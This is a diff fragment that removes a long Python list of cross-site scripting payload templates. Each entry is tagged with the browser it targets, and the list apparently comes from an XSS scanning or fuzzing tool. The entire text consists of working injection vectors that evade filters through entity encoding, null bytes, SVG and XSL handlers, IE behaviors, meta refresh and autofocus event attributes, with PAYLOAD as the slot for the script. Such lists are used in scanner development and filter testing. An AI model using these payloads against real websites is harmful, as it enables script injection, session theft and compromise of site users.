-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="PAYLOAD"/> <animate attributeName="onunload" to="PAYLOAD"/> </svg>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">PAYLOAD</handler> </svg>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E PAYLOAD %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:PAYLOAD"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">PAYLOAD</handler> </svg>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<svg><style>&ltimg/src=x onerror=PAYLOAD// </b>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:PAYLOAD"/>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.PAYLOAD</script></svg>")'></svg>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<?xml-stylesheet href="javascript:PAYLOAD"?>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<!DOCTYPE x[<!ENTITY x SYSTEM "PAYLOAD">]><y>&x;</y>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "PAYLOAD"><x>&x;</x>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='X'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3EPAYLOAD%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "x" onerror CDATA "PAYLOAD"> ]><img /><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:PAYLOAD" xlink:type="simple">XXX</x> </doc>''',
-		  'browser':"""[Opera] [FF]"""},
-		{ 'payload':'''<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:PAYLOAD"/></onevent><timer value="1"/></card>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<?xml-stylesheet type="text/css"?><root style="x:expression(PAYLOAD)"/>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:PAYLOAD" xlink:type="simple"/>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(PAYLOAD);%7d"?>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:PAYLOAD"><x:timer value="1"/></x:template>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:PAYLOAD//#x"/>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="PAYLOAD#x"/>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`PAYLOAD` >''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=PAYLOAD&gt;`>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=PAYLOAD&gt;>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:PAYLOAD">XXX</a>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<event-source src="PAYLOAD" onload="PAYLOAD">''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<a href="javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=PAYLOAD&gt;">''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<SCRIPT SRC=PAYLOAD?<B>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<SCRIPT/SRC="PAYLOAD"></SCRIPT>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<iframe src=PAYLOAD <''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<LAYER SRC="PAYLOAD"></LAYER>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<STYLE>li {list-style-image: url("javascript:PAYLOAD");}</STYLE><UL><LI>X''',
-		  'browser':"""[Not Info]"""},
-   		{ 'payload':'''<META HTTP-EQUIV="Link" Content="<PAYLOAD>; REL=stylesheet">''',
-		  'browser':"""[Opera 8]"""},
-		{ 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="PAYLOAD">''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:PAYLOAD;');}</STYLE>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>PAYLOAD&&;&&<&&/script&&>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<SCRIPT onreadystatechange=javascript:PAYLOAD;></SCRIPT>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<style onreadystatechange=javascript:PAYLOAD;></style>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>PAYLOAD;</html:script></html:html>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<embed code=javascript:PAYLOAD;></embed>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<frameset onload=javascript:PAYLOAD></frameset>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<object onerror=javascript:PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<embed type="image" src=PAYLOAD></embed>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<a href="jav&#65ascript:PAYLOAD">X1</a>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<a href="jav&#97ascript:PAYLOAD">X1</a>''',
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<embed width=500 height=500 code="data:text/html,<script>PAYLOAD</script>"></embed>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=PAYLOAD&amp;gt;>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script>if(document.createElement("td").cellIndex == 0){PAYLOAD}</script>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v == -1){PAYLOAD}</script>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v> 1){PAYLOAD}</script>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v== undefined){PAYLOAD}</script>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<div/style="width:expression(confirm(PAYLOAD))">X</div>''',
-		  'browser':"""[IE7.0]"""},
-		{ 'payload':"""<sVg><scRipt %00>alert&lpar;PAYLOAD&rpar;""",
-		  'browser':"""[Opera]"""},
-        { 'payload':"""<svg><script x:href='PAYLOAD'""",
-          'browser':"""[Opera]"""},
-        { 'payload':"""&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(PAYLOAD)>OnMouseOver""",
-          'browser':"""[Opera|FF2.0]"""},
-        { 'payload':"""<svg><script psy> alert(PAYLOAD)""",
-          'browser':"""[Opera]"""},
-        { 'payload':"""<iframe %00 src="&Tab;javascript:prompt(PAYLOAD)&Tab;"%00>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<svg><style>{font-family&colon;'<iframe/onload=confirm(PAYLOAD)>'""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<input/onmouseover="javaSCRIPT&colon;confirm&lpar;PAYLOAD&rpar;"''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img/src='%00' onerror=this.onerror=confirm(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<form><isindex formaction="javascript&colon;confirm(PAYLOAD)"''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img src='%00'&NewLine; onerror=alert(PAYLOAD)&NewLine;""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script/&Tab; src='PAYLOAD' /&Tab;></script>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<ScRipT 5-0*3+9/3=>prompt(PAYLOAD)</ScRipT giveanswerhere=?""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script /*%00*/>/*%00*/alert(PAYLOAD)/*%00*/</script /*%00*/""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""&#34;&#62;<h1/onmouseover='\u0061lert(PAYLOAD)'>%00""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=alert(PAYLOAD)>">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(PAYLOAD)" http-equiv="refresh"/>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<svg><script xlink:href=data&colon;,window.open('PAYLOAD')></script""",
-          'browser':"""[Chrome] [FF]"""},
-        { 'payload':'''<meta http-equiv="refresh" content="0;url=javascript:confirm(PAYLOAD)">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img/&#09;&#10;&#11; src='~' onerror=prompt(PAYLOAD)>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(PAYLOAD)"&#11;&#10;&#09;;>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""http://www.google<script .com>alert(PAYLOAD)</script""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script ^__^>alert(PAYLOAD)</script ^__^""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""</style &#32;><script &#32; :-(>/**/alert(PAYLOAD)/**/</script &#32; :-(""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''&#00;</form><input type&#61;"date" onfocus="alert(PAYLOAD)">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<form><textarea &#13; onkeyup='PAYLOAD'>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script /***/>/***/confirm('PAYLOAD')/***/</script /***/""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<iframe srcdoc='&lt;body onload=prompt&lpar;PAYLOAD&rpar;&gt;'>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(PAYLOAD)&NewLine;>X</a>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script ~~~>alert(PAYLOAD)</script ~~~>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;PAYLOAD&rpar;>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<///style///><span %2F onmousemove='alert&lpar;PAYLOAD&rpar;'>SPAN""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img/src='http://i.imgur.com/removed.png' onmouseover=&Tab;prompt(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(PAYLOAD)>'""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<marquee onstart='javascript:alert&#x28;PAYLOAD&#x29;'>^__^""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<iframe/%00/ src=javaSCRIPT&colon;alert(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(PAYLOAD) /*iframe/src*/>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""//|\\ <script //|\\ src='PAYLOAD'> //|\\ </script //|\\""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(PAYLOAD)>'</font>/</style>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<a/href="javascript:&#13; javascript:prompt(PAYLOAD)"><input type="X">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""</plaintext\></|\><plaintext/onmouseover=prompt(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<div onmouseover='alert&lpar;PAYLOAD&rpar;'>DIV</div>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<a href="jAvAsCrIpT&colon;alert&lpar;PAYLOAD&rpar;">X</a>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<embed src="PAYLOAD">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<object data="PAYLOAD">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<var onmouseover="prompt(PAYLOAD)">On Mouse Over</var>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<img src="/" =_=" title="onerror="prompt(PAYLOAD)"">''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<%<!--'%><script>alert(PAYLOAD);</script -->""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<iframe/src \/\/onload = prompt(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<iframe/onreadystatechange=alert(PAYLOAD)""",
-          'browser':"""[Chrome] [IE]"""},
-        { 'payload':"""<svg/onload=alert(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<input value=<><iframe/src=javascript:confirm(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<input type='text' value='' <div/onmouseover='alert(PAYLOAD)'>X</div>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""http://www.<script>alert(PAYLOAD)</script .com""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<svg><script ?>alert(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img src='xx:xx'onerror=alert(PAYLOAD)>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<object type="text/x-scriptlet" data="PAYLOAD "></object>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;alert(PAYLOAD)"/>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<math><a xlink:href="PAYLOAD">click''',
-          'browser':"""[Chrome] [FF]"""},
-        { 'payload':'''<embed code="PAYLOAD" allowscriptaccess=always>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<svg contentScriptType=text/vbs><script>MsgBox+PAYLOAD""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('PAYLOAD')>""",
-          'browser':"""[Chrome] [IE]"""},
-        { 'payload':'''<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert("PAYLOAD")"></script a=\u0061 & /=%2F''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/PAYLOAD/)></script""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<object data=javascript&colon;\u0061&#x6C;&#101%72t(PAYLOAD)>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script>+-+-1-+-+alert(PAYLOAD)</script>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<body/onload=&lt;!--&gt;&#10alert(PAYLOAD)>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<img src ?psy?\/onerror = alert(PAYLOAD)""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<svg><script>//&NewLine;confirm(PAYLOAD);</script </svg>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(PAYLOAD)>ClickMe""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script x> alert(PAYLOAD) </script 1=2""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<div/onmouseover='alert(PAYLOAD)'> style='x:'>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<--'<img/src=' onerror=alert(PAYLOAD)> --!>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(PAYLOAD)></script>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>''',
-          'browser':"""[Chrome]"""},
-        { 'payload':"""'><img src=x onerror=window.open('PAYLOAD');>""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<form><button formaction=javascript&colon;alert(PAYLOAD)>CLICKME""",
-          'browser':"""[Chrome]"""},
-        { 'payload':"""<form id="test" /><button form="test" formaction="javascript:PAYLOAD">X""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<input onfocus=javascript:PAYLOAD autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<select onfocus=javascript:PAYLOAD autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<textarea onfocus=javascript:PAYLOAD autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<keygen onfocus=javascript:PAYLOAD autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<input onblur=javascript:PAYLOAD autofocus><input autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""<body onscroll=PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""X<form id=test onforminput=javascript:PAYLOAD><input></form>""",
-          'browser':"""[HTML5 Injection]"""},
-        { 'payload':"""X<form id=test><input></form><button form=test onformchange==javascript:PAYLOAD>X""",
-          'browser':"""[HTML5 Injection]"""},
-        #Added 03/04/2015
-        { 'payload':'''<img src=1 href=1 onerror="javascript:PAYLOAD"></img>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<audio src=1 href=1 onerror="javascript:PAYLOAD"></audio>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<video src=1 href=1 onerror="javascript:PAYLOAD"></video>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body src=1 href=1 onerror="javascript:PAYLOAD"></body>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<image src=1 href=1 onerror="javascript:PAYLOAD"></image>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<object src=1 href=1 onerror="javascript:PAYLOAD"></object>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script src=1 href=1 onerror="javascript:PAYLOAD"></script>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg onResize svg onResize="javascript:javascript:PAYLOAD"></svg onResize>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<title onPropertyChange title onPropertyChange="javascript:javascript:PAYLOAD"></title onPropertyChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe onLoad iframe onLoad="javascript:javascript:PAYLOAD"></iframe onLoad>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onMouseEnter body onMouseEnter="javascript:javascript:PAYLOAD"></body onMouseEnter>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onFocus body onFocus="javascript:javascript:PAYLOAD"></body onFocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<frameset onScroll frameset onScroll="javascript:javascript:PAYLOAD"></frameset onScroll>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:javascript:PAYLOAD"></script onReadyStateChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseUp html onMouseUp="javascript:javascript:PAYLOAD"></html onMouseUp>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onPropertyChange body onPropertyChange="javascript:javascript:PAYLOAD"></body onPropertyChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg onLoad svg onLoad="javascript:javascript:PAYLOAD"></svg onLoad>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onPageHide body onPageHide="javascript:javascript:PAYLOAD"></body onPageHide>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onMouseOver body onMouseOver="javascript:javascript:PAYLOAD"></body onMouseOver>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onUnload body onUnload="javascript:javascript:PAYLOAD"></body onUnload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onLoad body onLoad="javascript:javascript:PAYLOAD"></body onLoad>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:PAYLOAD"></bgsound onPropertyChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseLeave html onMouseLeave="javascript:javascript:PAYLOAD"></html onMouseLeave>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseWheel html onMouseWheel="javascript:javascript:PAYLOAD"></html onMouseWheel>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<style onLoad style onLoad="javascript:javascript:PAYLOAD"></style onLoad>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:PAYLOAD"></iframe onReadyStateChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onPageShow body onPageShow="javascript:javascript:PAYLOAD"></body onPageShow>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:javascript:PAYLOAD"></style onReadyStateChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<frameset onFocus frameset onFocus="javascript:javascript:PAYLOAD"></frameset onFocus>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<applet onError applet onError="javascript:javascript:PAYLOAD"></applet onError>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<marquee onStart marquee onStart="javascript:javascript:PAYLOAD"></marquee onStart>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<script onLoad script onLoad="javascript:javascript:PAYLOAD"></script onLoad>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseOver html onMouseOver="javascript:javascript:PAYLOAD"></html onMouseOver>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.javascript:PAYLOAD"></html onMouseEnter>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:javascript:PAYLOAD"></body onBeforeUnload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseDown html onMouseDown="javascript:javascript:PAYLOAD"></html onMouseDown>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<marquee onScroll marquee onScroll="javascript:javascript:PAYLOAD"></marquee onScroll>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:javascript:PAYLOAD"></xml onPropertyChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<frameset onBlur frameset onBlur="javascript:javascript:PAYLOAD"></frameset onBlur>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:PAYLOAD"></applet onReadyStateChange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg onUnload svg onUnload="javascript:javascript:PAYLOAD"></svg onUnload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseOut html onMouseOut="javascript:javascript:PAYLOAD"></html onMouseOut>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onMouseMove body onMouseMove="javascript:javascript:PAYLOAD"></body onMouseMove>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onResize body onResize="javascript:javascript:PAYLOAD"></body onResize>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<object onError object onError="javascript:javascript:PAYLOAD"></object onError>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onPopState body onPopState="javascript:javascript:PAYLOAD"></body onPopState>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<html onMouseMove html onMouseMove="javascript:javascript:PAYLOAD"></html onMouseMove>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<applet onreadystatechange applet onreadystatechange="javascript:javascript:PAYLOAD"></applet onreadystatechange>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onpagehide body onpagehide="javascript:javascript:PAYLOAD"></body onpagehide>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<svg onunload svg onunload="javascript:javascript:PAYLOAD"></svg onunload>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<applet onerror applet onerror="javascript:javascript:PAYLOAD"></applet onerror>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onkeyup body onkeyup="javascript:javascript:PAYLOAD"></body onkeyup>''',
-		  'browser':"""[Not Info]"""},
-        { 'payload':'''<body onunload body onunload="javascript:javascript:PAYLOAD"></body onunload>''',
-		  'browser':"""[Not Info]"""},
